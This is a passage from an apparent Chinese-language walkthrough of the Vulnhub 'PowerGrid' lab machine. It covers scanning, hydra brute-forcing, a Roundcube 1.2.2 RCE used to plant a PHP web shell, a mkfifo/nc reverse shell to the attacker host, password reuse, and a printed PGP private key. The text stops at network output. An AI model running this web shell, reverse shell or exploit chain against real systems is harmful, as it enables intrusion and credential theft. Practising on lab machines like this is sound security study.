PowerGrid
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:20:6b:2a 1 60 PCS Systemtechnik GmbH
192.168.56.107 08:00:27:b1:02:85 1 60 PCS Systemtechnik GmbH
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.107 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 21:40 EDT
Nmap scan report for bogon (192.168.56.107)
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: PowerGrid - Turning your lights off unless you pay.
|_http-server-header: Apache/2.4.38 (Debian)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS LITERAL+ post-login more STARTTLS Pre-login IMAP4rev1 SASL-IR capabilities ENABLE ID OK listed LOGINDISABLEDA0001 have IDLE
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after: 2030-05-17T16:49:55
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS LITERAL+ post-login more OK IMAP4rev1 SASL-IR capabilities ENABLE ID AUTH=PLAINA0001 listed Pre-login have IDLE
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after: 2030-05-17T16:49:55
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:B1:02:85 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
获得Shell
/zmail需要网页基本认证
从网页内容看,有3个用户名deez1, p48 and all2,将其创建为用户名字典,然后用hydra进行破解
成功通过基本认证,用相同的用户名和密码进行网页登录
有一封邮件:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ vim pgp_message
┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ cat pgp_message
-----BEGIN PGP MESSAGE-----
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
RO1va5L9lriZ1vmP37FxIwsrCVVcNrPJxWydvw==
=fPY9
-----END PGP MESSAGE-----
从About页面可知Roundcube Webmail的版本为1.2.2,该版本有相应的远程执行漏洞:
https://www.exploit-db.com/exploits/40892
根据漏洞利用步骤利用burpsuite修改请求:
然后访问rce.php文件
phpinfo();可以成功得到执行
现在创建一个shell.php文件,写入一句话:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ cat shell.php
<?php
system($_GET['cmd']);
?>
对一句话url编码:
%3C%3Fphp%0A%20%20%20%20%20%20%20%20system%28%24_GET%5B%27cmd%27%5D%29%3B%0A%3F%3E%0A
然后访问shell.php文件
──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ curl http://192.168.56.107/shell.php?cmd=id
01999 <<< To: [email protected]
01999 <<< Subject: uid=33(www-data) gid=33(www-data) groups=33(www-data)
01999 <<< MIME-Version: 1.0
01999 <<< Content-Type: text/plain; charset=US-ASCII;
01999 <<< format=flowed
01999 <<< Content-Transfer-Encoding: 7bit
01999 <<< Date: Sun, 19 Mar 2023 22:37:34 -0400
01999 <<< From: [email protected] -OQueueDirectory=/tmp -X/var/www/html/shell.php
01999 <<< Message-ID: <[email protected]>
01999 <<< X-Sender: [email protected] -OQueueDirectory=/tmp -X/var/www/html/shell.php
01999 <<< User-Agent: Roundcube Webmail/1.2.2
01999 <<<
01999 <<< jason,hello
01999 <<< [EOF]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.146 5555 >/tmp/f
需要对reverse shell命令进行URL编码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.107] 44276
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@powergrid:/var/www/html$
www-data@powergrid:/home$ cd p48
cd p48
bash: cd: p48: Permission denied
www-data@powergrid:/home$ su - p48
su - p48
Password: electrico
p48@powergrid:~$
用相同的密码切换到用户p48
48@powergrid:/var/www$ cat flag1.txt
cat flag1.txt
fbd5cd83c33d2022ce012d1a306c27ae
Well done getting flag 1. Are you any good at pivoting?
p48@powergrid:~$ cat privkey.gpg
cat privkey.gpg
-----BEGIN PGP PRIVATE KEY BLOCK-----
lQdGBF7EMI8BEACkkD/7Trad64+JxRNQSrFt1fuOk/nmTO+jvzOjaL9krMgPMH+M
74t8StzUN0dySOXZcPvYFuZcdbX7Tbpns4ib/w5KDoWxGlGzKQf9NDwn9aMaWErp
ZZhLgehNSee79oUUC/s86e7896lmFDM9uVvcEucSrlPF1KRYsDDIETjfpAHtSZI5
0zWKBod6VegIw0S3tnYqxOb3x3Sq0DcyTUjxaVkI3E3WOsHqQKl9gUVh/uKfHIMI
A7EcDJcyv8p00FK5CMxVFLmMRBrKqpSTVF8WOK1LMjN5w+OZbq4Lnmi3CgAcCKlG
r1EqRZUnaldElPJ0+fQZLIc6BAN4KlhUyCL7H/jnw3v2kyS+fOFLDuQWePQJJ+/V
bp/rBp3DFbE22004NIsoiCWqcGoW1Cw1AjM6ZTEE28Oet1AVAJgaBzLlm8258XF6
AW4VygooOH1hyiuy6Kq2XZxbd1u05ScRie+/g4W7PpyQz7FJ1bkDAHPY/Vw2rN9u
iluQrEAvW9yoAMja288CgpmOXIcUkvr4lx6u6+AeHVuaMaKM2qThdlEt+w6YxEM2
oxM+6EyzklRf6BwmDWy+jBCyY42T9/Sge0y+RdzCym05AW6PsuDjNZRmr4HgkE9U
WeYH4poTgwtQeP4PWqdEPWsFitl97v7Lo7KVpgBD4WyvrWfAQ6PYBZ9ddwARAQAB
/gcDAh8v/BgIX/xK9JiBrQ5RLLD4Xtb4ljo+vhrUDYAWChYNx+uPRwFYgEkaeJeg
Zc8ubOvq7PY5YHWIsXENB0GQdb4FWuJVGWCPXZCKS0bNeFCLfu527R4Rj0lp359I
dS0KTRkVneR5S+g5X1tf6WWJWcpY7ONOGZhxUKJiM2ceBA6yzLeBbVDHrFgQooIk
NPmiI6lIJ2R8OieQw8nnHyx3fL6IvmnLOFL0l8mVlMHe2krfcoW1CTc52Cw759N2
t6O00M8neNjAmd2DMfM1x+Vr/NeF9R+L9vvCaDnUQAsVpxeU8cNmtEOfPcF4dSFb
c5sBA33I656TAyhpc3kthuF7QKHVx/L06utGO0h/0LLZC57EOQYBphn1o3kLsVVI
tNMdZ8jMRVuzpLGLnQiLu99+wkagW1Uxc7zEnOV38R7ILbSYUWRR3YXh1hSRTEYU
i4xrf3CCiXm1KTbboXcJGKdvKpCc2wfQV4hgPLmxqFcQJPWWSVXPw0nmflxGtD1O
tgHpMX98c6RozHWupof9Kbe6Y0Ur0w2lRS9Bg95bUprBVgI7fOAcCfuqhAmvMiZA
m8loDcK8twUDuBBG9bBvNf9bN5phfxOJgAP3rAmXY3GAA8j1LBi//IEDqJVr3oZI
AtBamkAaTRS1/IItVlJT+YA5Vu8YTeVFi9gF7WnAxJcJj9kN0lZCjczMw1f5AeVi
ot+2O8gzQ+ODF2N1mqvQrrGzEb/lTgM/V5gIozzz0HUR8CshshaJGKG8Vhy/sODz
WdJmvlWlVSF4p/QwjFhj6D74/czsTuTfX0PCEN0jSUoY8ntXuy+45TbA8GrYI8Cy
yup7/9DWv3t44LyEu5WIRXt124T3e04YuK3/J4zJfwMgzbM2e+S+/2u0aEF0cF4E
sYobYpV28GD6hLTLMvdgs1HZhJ5+SgzXXOpKkCAu6g6voE+4+NyBWmORi2zZlDkT
faYYbHhShRvOsYmhD1xbBVnONYIN1JDDq1oXaHlhwAIFODlTJm3nPbnhqlKcXv40
YLcaZCmfo35/vI122s/GzyCOL3Tehv/X4rfnLkpje3XspdJ3e3rvrmvqsv2L45r9
YG8Lwq+CP98O9UScG7aQTIEhPYVcio+U+5C9wCjB/PfysFuX5QXfvhFEo9QtxQDv
G7fhE/Ku0oLBNzcDX7v2c3Ny+fT77mqhshTuYM03sraRIDibXTRxEtpB3l4CgAfL
HCBuVOsJPa07PvCLgUlf6OPi65URvOI8W+d3X3i0ZqSy4Zq/ZBUK54+KA+JHSppl
TeeiD+Ner3jg3aNC5ftsnuGC53co3Jko0GaQRjM3aTMczW/Tb/TUl4g1PC/PZTxJ
z7XdJ0QTOpVub9HWJ7f8oALairav8KH5leRxjH6oiVnNFRxrczrSP8GY7s7yRRWK
K8hsGtABa7HHlP06gt891IWvmOuom8/GB/xiHuydFGU4Jh6/VyMBJ5CW536/zyRF
ARKEp9VjcK6aqI8WS7UgcvuQuHMPc0mpbR68AEpLSrbWYFVU53brcY+XU1BDaG4K
+xuwPDFlFksNrLba2xCQJuiU7LH4FihbV5JPE0NOj06KhmWjzwit6sOMRj8PjyYx
Pd2nIRZ/JZg9v9qKSr+kdGNYDMWzyIhG/DfFycvgHqe9V+6xBQNFtzFwxRCFgHOD
2lPYgWl2mnZPWN0VmIJ0t/H+NQZF9WIbiEtd0axiRg0zpE6AMKQ3xzD1MWnVKuQu
g35DXTNQYWLIzJNrYsE93/aYmhbpkLh51RVhDq3NGyqNWnUoGT0EKUC0GlA0OCBI
YWNrZXIgPHA0OEBwb3dlcmdyaWQ+iQJOBBMBCgA4FiEEdiNMQ+hO/JKQTKyMc9GY
IOKRmb0FAl7EMI8CGwMFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQc9GYIOKR
mb2f+g//Vt1PcacNppdlf4Mgrf0WfRm8VbW7GKzo6OH51gLNFfJjxOTqf0EBCI9u
UJKcU5P0zzxuifMCt6qO7MadxPwcN3h1W5OWjVR6a/CnexFkLOnWS4xq1UKxQ8IF
qnakMVU+mtU1AffAa5DNzEBOYkEaPOmEX8MBWoGOWuqLILO7IBAEMWnSPpEAUxcr
pO8h3fam5Ev7zcaGEE+PuNLcJCwBOLiUwu0iqkcaB6jtil5yIwvo8qKgE626rj/o
vNzeJqlS1iEAnMXJfIyoH2x8mpKVpWHFrjeIVtG9TtxU5YU2ENzh67spcxiQ2CK4
kRYucjuF7rPp2pOMQ/f6IXPwLGf5oz0w3DHscZMNv3KufYzP6CSuCMNITsfq6gwH
EVG2MJKTDy5b8S8LE3uhxZ/em6dx/xUwwLE/hRxjINF4EeEKmf/P5xQrm6GLTw+o
KQmsOghYEuBOGLyf5QA1+my8b6SWby/Rlapdfne3oKWrpkWqYrJ0VorbDO1S17m1
SjUlF4pb8wGjW5vECPNi4VVA62cOoHE8khT6/tRScG0UTFA86UenqjFKl3k9jnBu
thkqPeuljRCtLlfKMJZ0rep2pEtiXE4PPse7EG/HONfo2gPtQcbkz8ff7Y8+oTo1
heIaub2h7N8CYg2NZsensJGR7j2ML2DU0xFoZCQufhvvgSj1hVmdB0YEXsQwjwEQ
AL5/8C/atcsEqw5jGvxdWjp8uY0+NqFrG8RgzLID5xahMEPYBwEcvH1/amm/8wSd
pdYsi+6mteUzjFbUw9oWmeBZx0SlJYEIyz1UG70nSaxyFJL6PaTMbXRGzQy6K/0+
wA2qRCV2sBFQdyScNsAtDKugWn9oiJxomkIiMWekslV9nAE32GSwYQ87OdQstcc+
h3a5MI9Y0nldOFzmddS+6Q6PtKK3yxBdGI29FtiG6+b6E/Rb2DIEd53p39qZj+rz
jCl8hQr/AxPuNGe66z2ym4VSfXkpmNiotzORTv+3AkXblsFLewbs4drehgJ03NJM
5vtkFSxdiwD2YQ+p9K5Gx+A3sYH+rLvQvHpGMQNsQHUs5cN/2i+Jisz4cJdL+4el
dEJCxltE8hfe+4v6uhjpqHEbP0Axb+r8qp6Nd2zwOR3TqcP3jUm5Jvj1aRsm7y4+
fmaLE0DF2v+qci3UEEAqRp6DD8vMiBTCp2tQGQ8pVDGJbpvYWJ02qLlJnlixn8He
nkyaseMWXrBkXUxigIYNqofe654+XCKlKszLAo9Eouh1nockUNvDpUtkoAR3QmGn
Mtzr/oq7vYTdLSik4ohRpxn247S3WXzSUygCv8lsgZotVjNzifsuEZBM4cdSrl8T
/mPilj5GWDa7Ee1sqPg4gfbcbNrqv0rwj9Br78e/cWEHABEBAAH+BwMCMS36XhI1
B3/0E7g7OQ41Pkpgvo3Kd6i1jcK7CMcoUtQaozqN3msPEJSX4wGw2kO/BgzUbQVa
g80p22096uN/7gbm/Duasmb2TKhQeue6v9hv5A9bY0XPucUwThBh5bAZmDG5NXJK
SCY1y9c0DEFFMKg8NWRICq9wUp7ch2daZpmWYF6j1RiRHrIoB0HG703D37sN6MRs
n3Nv3NHifJ+0rqVlpL3ikNlwAjdcEip3GsPFS0gN8rXl5EBfd26x7gng4rrOH/wi
lGMNNYbSfAjXvW1mt8c+fZcC8Qb7ErVeH2RcbfEcbUihQAkWuciqKoYJBHxJ3k2e
n7pHwdJ+No4VxaasRJ+s45Dr8DboNKnVQVQNRpo4uWP0LhHQsw0ereoRhOkbJp+V
CS/Kw7yAjQvLB0WdU/Ulm1xQ9q1av4E8AukFF1uW90oFt/G4Bfpg1Yj7Ylke0TX1
a92DZooVGGiEhW3thi+DvKd4oGzEPc5Zp1F/Qo6IanHIMmcvmVzgErpKSZ/CwrdY
IGsuOLeH8s5UHGlesIB5mieLdqJ2OTYl/OSpYrzh1lSpytqrXM5u6eypBmIMol8H
iQeJ2wOZEOOMlcZxfm1drNI9fPSg3Hs1MWz/K1Pq4WJhZkK9SyJfKAS4ZPjB11Gi
US3pn1fbxc/FJrTsvWfy24ag3U8EdgmkvQ4IE3sc6UPN73gEK6nxhZpVCP2Zc5PS
veckbUZ3rHaZuVSjmlr5X5ypCuK5fgq2/M9qtIgHb1nBWsWrNLRd9NLG1jvCPHiw
ME353bVFdtZdSupoE3SGLpPTH5snl96w23DEzngu7eN2Yhwfgtc9GnhbE5d2rA/M
2pKZEFuYSlUM/CE9tWFGPVsoWmJPyGLGh87rc5N9LIfhMNOH2vo2v/Zz5J8wRI9v
FhAdIZW6JFCj2mg0toz//F76wdyc/eH4WjrDn/11vLGe5a3hZQiUSrUIpoGitM9j
SocjcCRQTV4da4oOWigZLOOdgQYlYHvXN80fVTuQnqNYB/roiv9ZFSXB4vL8FLk0
iT/74cxft6m2Cg5//pnjHkqlVL+aWXWKk2hOrxDr3F3j+OyO5fWEf9lBPnf155ZS
gVkxWpBjaCpGHdpqf8s6whParNDyAtOCvQz8+377EI1y31RED+VbL608ln2iKOvt
gL9cC/dZ6aBNbtQGU+nxXdGrDQJra9U3nyRfrb+Q+citfAcuilKCORQbXFnt+3JZ
IJeuOJx0SFlMvpg1I/Mta2PsR/vLlox8YmI9Jn+aBBK11I2ovIUJk/NfKuE1+JL8
rOn7rmC3LN08vBP29JnhwhgCIpNsgx59Jzuck6CkLgwPx04FR3K/1+6GVbx94q+S
zhlvDjr4A8QqeqWq0bE5O46EksHw+0/bsZX4+bScTwePrKn+9UPvXcaLd8yiS7Io
HKgy1jmHmA/lJqHMIX6YUtyGBK5yL+cA8BfZ1OWRZgc+Whq4YE7hzFEHpWLjJj7p
tpYu9nyRpbm99myWwpF1RTfRPoBkYBx7K9WRTPDH2VaUhbyaOnKQLibmJh0QKmmK
0HA4YW4fgohdjUOjMQ0pPHKnkKKCsN0QQxM9zt0TPx+tIwRvuoYvdKn2j03yBpbY
LfRItzDjX7C/7OfKOR92UACQb/mt1dANxbA1aZtOZl98Rrax5+jx43CruG8Ij+nE
BP3LvRH4jGtDFbyAS88n2jPUb7Gw3S2DW//FinSrRdMW4PdsI7/4NLqXcM4VmsEn
qHscy+pJIs3dxhHpL2Npn7qhw5Ph1L8SQ95YmKv0DYkCNgQYAQoAIBYhBHYjTEPo
TvySkEysjHPRmCDikZm9BQJexDCPAhsMAAoJEHPRmCDikZm9PcUQAJ7lP8Ve1fFY
1f90DtFgYxth9nhF0eflsL/EwsHpdCT6RjWPxUv9azqEvWjq2LJYZaHPo3ht/1Dz
PpV46mkPw4+Bq0JyMVNyC6Vw9nlWQNWKe6QzAeqXpiy7p1A2pQCtwQGwMVnSFpmv
vwTYqSOI3/Ew0l2be8oGK7x1NFDQL6DBwZF8PtBk7Usmy2pjPFBuKXat+MZZDy2b
jW2LFpl7Cnd87JWf/KIB3zLhUG2aOLqCKxUM+00y1Q2oIEvK0aVBdeDejYx6NG59
BkfjmR2l72eAuOyChLt9ZHfFqJjZUfv8gO99i6LvwiziUVqYQlQ0Dh2vi4oihz84
lFxYKvDN+BXLzFabMvMu4rRnLVSRaTsmfASvHou4BA/BOl/EGQZEMA3282A7ZE9+
ss5iPM4T2AQ2GVGqiA42DCJ+z3me3YNoTix4erULUNErsEJXRVZb/wJZao0mNiWJ
WdFSQ+rlz0OYn7owoPbUXoI38CaGbSOvdFt7AjsgviZzASFDwwFeF4T4wwFP2dgD
y04QkdD7KwSLaPBrf12/4I6xB+pUURgTvKXdlBbijtALzxog/pVJ6y1mvVoWxnDp
4RdWYedlhcFu8x3q8KlqJeWp6AHE7ztZB5DbymYewDhEtH0KSd3sJI1kkUdn4G36
O/LG7NOgNrGl6THJtM0huhXOtewCOFA/
=KOs+
-----END PGP PRIVATE KEY BLOCK-----
将其导入gpg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ gpg --import privgpg
gpg: /home/kali/.gnupg/trustdb.gpg: trustdb created
gpg: key 73D19820E29199BD: public key "P48 Hacker <p48@powergrid>" imported
gpg: key 73D19820E29199BD: secret key imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
然后解密之前的到gpg消息,从而得到ssh私钥
┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
└─$ gpg --decrypt pgp_message > id_rsa
gpg: encrypted with 4096-bit RSA key, ID 559041BFED54D3A2, created 2020-05-19
"P48 Hacker <p48@powergrid>"
gpg: Signature made Tue 19 May 2020 03:17:30 PM EDT
gpg: using RSA key 76234C43E84EFC92904CAC8C73D19820E29199BD
gpg: Good signature from "P48 Hacker <p48@powergrid>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 7623 4C43 E84E FC92 904C AC8C 73D1 9820 E291 99BD
将id_rsa上传到目标主机
p48@powergrid:/tmp$ wget http://192.168.56.146:8000/id_rsa
wget http://192.168.56.146:8000/id_rsa
--2023-03-20 03:04:25-- http://192.168.56.146:8000/id_rsa
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3381 (3.3K) [application/octet-stream]
Saving to: ‘id_rsa’
id_rsa 100%[===================>] 3.30K --.-KB/s in 0s
2023-03-20 03:04:25 (67.3 MB/s) - ‘id_rsa’ saved [3381/3381]
p48@powergrid:/tmp$ chmod 400 id_rsa
chmod 400 id_rsa
p48@powergrid:/tmp$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:b1:02:85 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.107/24 brd 192.168.56.255 scope global dynamic eth0
valid_lft 577sec preferred_lft 577sec
inet6 fe80::a00:27ff:feb1:285/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:cc:de:f9:7a brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:ccff:fede:f97a/64 scope link
valid_lft forever preferred_lft forever
5: veth56da78e@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 82:82:76:51:cd:23 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::8082:76ff:fe51:cd23/64 scope link
